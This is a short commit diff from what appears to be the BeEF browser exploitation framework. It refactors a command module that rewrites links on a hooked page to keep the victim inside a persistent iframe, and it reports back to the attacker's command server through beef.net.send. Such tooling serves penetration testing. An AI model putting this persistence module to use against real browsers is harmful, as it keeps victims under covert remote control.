Refactoring session.js moving the iframe persistence technique in dom.js. Updated iframe_above to use the new component.
This commit is contained in:
@@ -5,6 +5,6 @@
|
||||
//
|
||||
|
||||
beef.execute(function() {
|
||||
beef.session.persistent();
|
||||
beef.dom.persistentIframe();
|
||||
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Links have been rewritten to spawn an iFrame.');
|
||||
});
|
||||
|
||||
Reference in New Issue
Block a user